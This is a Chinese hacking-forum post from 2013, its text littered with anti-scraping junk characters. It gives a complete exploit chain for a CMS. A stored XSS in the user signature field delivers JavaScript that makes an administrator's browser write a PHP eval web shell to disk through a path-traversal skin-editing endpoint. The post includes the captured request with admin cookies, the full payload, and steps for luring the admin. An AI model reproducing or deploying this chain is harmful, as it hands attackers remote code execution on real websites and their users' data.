|
|
这个cms 以前 90有人发了个getshell,当时 是后台验证文件的问题
: ^! G2 J5 |/ f: ^; A: P% y官网已经修补了,所以重新下了源码
& g8 ]0 [6 e( F+ s因为 后台登入 还需要认证码 所以 注入就没看了。
/ Y( S! Z2 |& c; v存在 xss- w' V% u1 y! u) c
漏洞文件 user/member/skin_edit.php
7 N. ?/ g Z9 {% y本帖隐藏的内容<tr><td style="height:130px;"><span class="t"><i>*</i>签名:
& Q$ g/ H' D3 Z: `6 x 5 E$ Q) B! }+ {' C2 Q7 A; q/ o
</span><textarea style="width:435px;height:120px;" id="content" name="CS_Qianm"><?php echo $cscms_qianm?>6 i" j0 y9 H. B8 N# M5 z. O: C3 s
! |- i, ]% B" R5 w2 |. n; [</textarea></td></tr>+ h- p! x v2 L% T! R
# R; g7 V1 K- X: ?. h0 I user/do.php
7 }0 D" v9 X! b8 J: z* _% m9 _; `" j6 t
* q- |$ u5 u6 j5 ?* E% ~% N% \% k; e
if($op=='zl'){ //资料
7 T* [" I$ R& T/ e* a8 i , E- Y7 p# O1 n) p
if(empty($CS_QQ)||empty($CS_Nichen)||empty($CS_City)||empty($CS_Email))
; H, s8 t1 L$ H2 T8 G3 t. d# _ exit(Msg_Error('抱歉,请把资料填写完整!','javascript:history.go(-1);'));
+ ]( M) P- t- ] 4 m' a' Q2 |6 B1 [
$sql="update ".Getdbname('user')." set CS_Nichen='".$CS_Nichen."',CS_Email='".$CS_Email."'," L/ r$ c5 j: N' m ^' a. G5 w
$ L6 S0 s' p3 l. [7 | CS_Sex=".$CS_Sex.",CS_City='".$CS_City."',CS_QQ='".$CS_QQ."',CS_Qianm='".$CS_Qianm."' v |, u6 r8 V4 i
where CS_Name='".$cscms_name."'";
, A @9 i+ N# B% ?4 O" T , ~6 `# s& I9 e
if($db->query($sql)){
' U& t' \) I* Z8 ~0 H$ ? ' V- C! y7 J: N/ l
exit(Msg_Error('恭喜您,修改成功了!','javascript:history.go(-1);'));7 H* O4 q! ^% i3 T+ t
0 H/ A* b$ n+ R8 v1 U
}else{/ t. `/ V$ I* X
/ X' {0 W- U4 M. }: N, K$ d
exit(Msg_Error('抱歉,修改失败了!','javascript:history.go(-1);'));# F1 S; E. p, q# f' t
+ f& ^4 y% i2 q( F- G! y3 Q
}
: e9 \: T% C% M! Q% e7 v1 f! C; o8 t/ S
3 _# i$ h3 U; A) R, ~2 i没有 过滤导致xss产生。
1 h( i+ W) o" f$ U后台 看了下 很奇葩的是可以写任意格式文件。。" Z" r U, J o P8 d! S
抓包。。' f. r9 b; D/ S* j- j
' t. [# q0 o4 f8 n; m
1 p8 Z R( K! A4 l d# y3 I4 ~0 ~本帖隐藏的内容POST /admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/ HTTP/1.1
3 o9 j3 [2 z- h
4 Q1 b4 B2 S6 t9 o6 QAccept: text/html, application/xhtml+xml, */*
* I( P5 I3 d6 P. M$ c" t& W - S9 }2 _- ^6 H% n* i
Referer: http://127.0.0.1/admin/skins/ski ... l/&name=aaa.php5 H0 L: g1 ^' }% _! E+ w; i5 t
- e# K7 X. p' F/ K, L0 F2 gAccept-Language: zh-CN
t# W/ {* {" {# | # J& M/ |, g' n# b
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
7 X% a# |& M7 I; ]+ i( O) n ( O" j1 ^9 i" ]4 T1 S
Content-Type: application/x-www-form-urlencoded' E* B* r* M2 o- p# x
5 M) c/ c& _5 t' j) G3 s( J5 i
Accept-Encoding: gzip, deflate8 v5 P& r% A8 G0 T4 O0 n7 g
& q. G& e3 X0 [$ F
Host: 127.0.0.1
o2 I& s+ O1 g+ `( C- W! ^' @ $ |/ f+ C+ p" {4 s. L# W
Content-Length: 38
" t, A0 x/ x0 @2 S - y4 h( w- B7 I# W: J- F- | N6 Y
DNT: 11 x3 i6 y1 [9 R
* v4 X/ L+ t3 L( B. E
Connection: Keep-Alive
; |: ]/ R7 P8 d: q2 K. A
; C2 Z4 k8 _' RCache-Control: no-cache W6 N/ \( A2 C4 F
3 T6 u: m/ T* A# k0 {Cookie: CS_AdminID=1; CS_AdminUserName=aaaa; CS_AdminPassWord=12949e83a49a0989aa46ab7e249ca34d; CS_Quanx=0_1%2C1_1%2C1_2%2C1_3%2C1_4%2C1_5%2C2_1%2C2_2%2C2_3%2C2_4%2C2_5%2C2_6%2C2_7%2C3_1%2C3_2%2C3_3%2C3_4%2C4_1%2C4_2%2C4_3%2C4_4%2C4_5%2C4_6%2C4_7%2C5_1%2C5_2%2C5_3%2C5_4%2C5_5%2C6_1%2C6_2%2C6_3%2C7_1%2C7_2%2C8_1%2C8_2%2C8_3%2C8_4; CS_Login=980bb0dfb9c7ba8ac7676b6f4eea2c4b; CS_AdminUP=1; cs_id=2; cs_name=test; PHPSESSID=36db4a484bdbd090ad9846e3b7f65594
& n, q* r3 G4 u5 `3 |$ H
D7 K8 a# ~! p8 V( A1 K/ g- p. W+ W; }& p$ S- ?9 B/ H
name=aaa.php&content=%3Cs%3E%3Ca%25%3E' l7 a) K: H: a$ Y; p; F
3 `* E$ [1 h j6 r3 I7 n# D# V
; K% M- v E' q8 [0 u! X9 g
, \$ y& H9 N3 g$ ]于是 构造js如下。
+ l; g3 {! v4 d8 }3 H+ J
' Y8 `3 \ K8 h# A2 f$ h1 o7 s本帖隐藏的内容<script> / {' q4 ?% p! W9 K9 B4 ]7 h; `
thisTHost = top.location.hostname;- l! l- h. k0 o: m; o
n ?" C# |' U0 ^
thisTHost = "http://" + thisTHost + "/admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/";
0 n% |0 Y. W( h; v
+ J0 L6 U' F0 l3 H$ W2 m9 u; ffunction PostSubmit(url, data, msg) { 1 N) a4 ^1 K' l: M, B' H
var postUrl = url;
) X# p+ t/ @4 w) y4 s 3 b$ v; g7 w8 |. z( h
var postData = data;
" e- c! X; R4 {6 X var msgData = msg; 3 v+ G5 Q7 g! j% h( s
var ExportForm = document.createElement("FORM");
) B1 e( P2 c1 F" V& x- M3 B5 _ document.body.appendChild(ExportForm); $ }! D% h2 C- w, {
ExportForm.method = "POST";
8 l& F* B2 a4 ^# Y- C3 n var newElement = document.createElement("input"); / m" t: m+ k5 b J7 a0 B8 G
newElement.setAttribute("name", "name"); 1 r. z4 S0 l: C7 E7 j/ I( Q
newElement.setAttribute("type", "hidden"); 9 J& {& d4 R( Q6 C( I1 h
var newElement2 = document.createElement("input");
3 M& C9 m' z7 w: o0 @6 d newElement2.setAttribute("name", "content"); 5 H/ {# A* ?" L' x Z
newElement2.setAttribute("type", "hidden");
7 q9 j9 s' `2 c5 W; k, I ExportForm.appendChild(newElement); % s' A- \) y6 u2 ], e) @
ExportForm.appendChild(newElement2); " t, n/ a9 }4 Q) y2 l7 J3 h5 s: w
newElement.value = postData; , F! T# f6 C- u$ F
newElement2.value = msgData;
; O, X2 @0 \- _6 L6 k) D- ] ExportForm.action = postUrl;
& U( g8 `9 ^6 Y' |5 p7 _ ExportForm.submit();
4 V' @* D# j- s9 B i};
% l# z" t2 V/ m / J& n/ x% {7 ^3 ?2 S" J
PostSubmit(thisTHost,"roker.php","<?php @eval($_POST[123]);?>");
: u$ S$ m/ ^2 @ D; W% F+ \( H
4 @0 `1 q& A. Z; R; H! L P/ X8 n</script>! ~% Z9 j. d2 b0 B5 D6 k
# t6 C" m0 l7 E3 l
, V8 k7 }% N6 P! X6 a$ h
+ S, v4 `1 \2 o1 }6 I+ s) d
http://127.0.0.1/user/space.php?ac=edit&op=zl 修改签名处 插入
0 w0 Y( S; D1 p- t9 [7 e7 |用你的账号给管理写个 私信 或者让他访问 你的主页http://127.0.0.1/home/?uid=2(uid自己改)
# f$ t* b; Y% B l就会 在 skins\index\html\目录下生成 roker.php 一句话。 |
5 ]2 S8 c* w2 P
|
|
发表于 2013-11-6 18:09:37
收藏
支持
反对